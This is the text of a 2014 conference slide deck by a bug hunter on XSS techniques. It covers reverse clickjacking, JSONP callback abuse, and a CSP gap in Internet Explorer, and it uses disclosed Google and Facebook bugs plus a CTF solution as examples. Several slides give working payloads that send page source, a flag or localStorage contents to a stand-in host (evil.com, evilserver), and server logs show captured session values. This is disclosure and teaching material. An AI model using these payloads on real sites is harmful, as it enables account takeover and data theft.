Meeting #6.

1. Tricks to hack most popular websites
on the planet
By Pavel Toporkov
Jun 07, 2014

2. Pavel Toporkov
Positive Technologies
CTF player and organizer
Bug hunter

3. Bug Bounty
Found bugs - got bucks
Bug Bounty programs:
• Google
• Facebook
• Paypal
• Github
• Yandex
• Mail.ru

4. They are not so dumb
• All SQL queries are escaped
• All user-controlled output is escaped
• External entities are disallowed
• and so on...

5. Good news everyone! We have XSS

6. Google bug
Google API Developer

7. Google API Developer

8. iframe
postMessage

9. Vuln #1
It’s possible to change iframe location.
https://developers.google.com/apis-
explorer/?base=https://evil.com%23webapis-
discovery.appspot.com/_ah/api#

10. Vuln #2
Not secure tokens
token_1 = location.hash.split('rpctoken=')[1];
token_2 = window.name;

11. Vuln #3
It’s possible to change documentation link.

12. Reverse Clickjacking time!

13. Reverse Clickjacking
http://domain/search?query=a&callback=draw
<script>
draw({"result":[search_result1, search result2]})
</script>

14. Reverse Clickjacking
Attacker can use useful functions:
document.forms[2].submit
document.links[4].click

15. Reverse Clickjacking
document.body.lastElementChild.
previousSibling.lastElementChild.
firstElementChild.firstElementChild.
lastElementChild.firstElementChild.
firstElementChild.firstElementChild.
nextSibling.click

16. Exploit
token_1 = location.hash.split('rpctoken=')[1];
token_2 = window.name;
send_payload(data,token_1,token_2);
window.setTimeout('document.location=callbac
k_url;',3000);

17. Pew Pew

18. PHD CTF 2014 Quals

19. DT_VCS
#1. JSONP callback spoofing
/colorer.php?callback=loadCode&code=code&la
ng=php
Trying to set lang value to “&callback=alert”…

20. DT_VCS
#2. XSS via Revese Clickjacking.
Post link like:
“javascript:alert('PWN')”
And callback like:
”document.body.firstChild.firstChild.nextSibling.firstChild.next
Sibling.firstChild.click”

21. DT_VCS

22. DT_VCS
Trying to steal cookie…
195.133.87.174 - - [27/Jan/2014:14:18:45 +0000] "GET
/?phd=PHPSESSID=2ch9tmve1potrd36hhklcg8tv4 HTTP/1.1" 200 647
"http://localhost/contributes.php?id=857" "Mozilla/5.0 (X11; Linux i686;
rv:22.0) Gecko/20130619 SlimerJS/0.8.4“
But PHPSESSID is not auth cookie. Let’s try to get page source via XSS.
document.write('<iframe name=ifr src=code.php
onload=location.replace("http://evil.com/?phd="+btoa(ifr.document.body.
innerHTML))>')

23. DT_VCS
Page source:
<form method=POST action=/code.php?deleteall>
<img src=/captcha.php>
<br>
<input name=code>
<input type=submit>
</form>

24. CAPTCHA over XSS?

25. DT_VCS
Seems like PHPSESSID used for storing correct CAPTCHA
value. So if we set our PHPSESSID cookie in admin
browser, we could know the correct captcha value.

26. DT_VCS
captcha='M6yEnn';
document.cookie='PHPSESSID=aminqljt6e7senfe9m53ucfoa0';
b=new XMLHttpRequest();
b.open('POST','/code.php?deleteall',true);
b.withCredentials=true;
b.setRequestHeader('Content-Type', 'application/x-www-form-
urlencoded')
b.onreadystatechange = function() {
a=new XMLHttpRequest();
a.open('GET','http://evil.com/?flag='+b.responseText,true);
a.send();
}
b.send('code='+captcha);

27. DT_VCS
195.133.87.174 - - [27/Jan/2014:15:08:46 +0000] "GET
/?flag=Good%20work.%20Here%20is%20the%20flag
:%20Nic3_Bl1nd_h4ck_x5s_n1Nj4 HTTP/1.1" 200
671 "http://localhost/contributes.php?id=863"
"Mozilla/5.0 (X11; Linux i686; rv:22.0)
Gecko/20130619 SlimerJS/0.8.4"

28. Facebook bug
https://developers.facebook.com/tools/explorer?path={ADDR}
<script src=“http://graph.facebook.com/{ADDR}?callback=func”>
</script>
/**/ func({
"id": "10000000000000",
"first_name": "Bug",
"last_name": "Hunter",
});

29. Solution
/login.php?next=address – redirects to address
https://developers.facebook.com/tools/explorer
?method=GET&path=login.php?next%3dhttps
%253a//graph.facebook.com/me%253fcallbac
k%253dalert

30. How it works?
Page /login.php
Evil Payload
302 Redirect

31. And now we have problem

32. Content Security Policy
Seems like we need to find another place for
our payload

33. Fuck it!

34. Dat feeling when you love IE

35. Content Security Policy
Internet Explorer completely ignores “Content
Security-Policy” header
It requires “X-Content-Security-Policy” header

36. Boooooom!

37. Video

38. Chrome tricks
var origin = location.href.match(/w+://[^/]+/)[0];
var url = 'http://domain/search2?query=' +
encodeURIComponent(params.query) + '&token=' +
encodeURIComponent(params.token) + '&key=' + key
+ '&origin=' + origin;

39. Chrome tricks
Let’s look a RFC1738
URL format:
//<user>:<password>@<host>:<port>/<url-path>

40. Chrome tricks
And if we try something like that
http://i_can_decode_something_like_this_&quot@pw
ny.in/reflector.php?data=<script>document.write(loc
ation)</script>

41. Chrome tricks
PoC to steal localStorage:
http://domain&quot-
location.replace(decodeURIComponent(&quot%2f%2
fevilserver%2f&quot)+JSON.stringify(localStorage))-
&quot@domain/s02#query=smthing

42. Chrome tricks
And now we need to bypass this:
if (XSS.sanitizeURL(location.href) !== location.href) {
location = 'about:blank';
}
How it’s possible?

43. Chrome tricks
HOLY 0DAYZZZ SOP BYPASS!!!

44. Chrome tricks
The main idea of SOP Bypass very simple - just execute
history.pushState with context of another page like
this:
history.pushState.apply(
frames[1].history,
['','',payloaded_url]
);
// Fixed now 

45. Chrome tricks

46. The End
@Paul_Axe
http://paul-axe.blogspot.com/
Questions?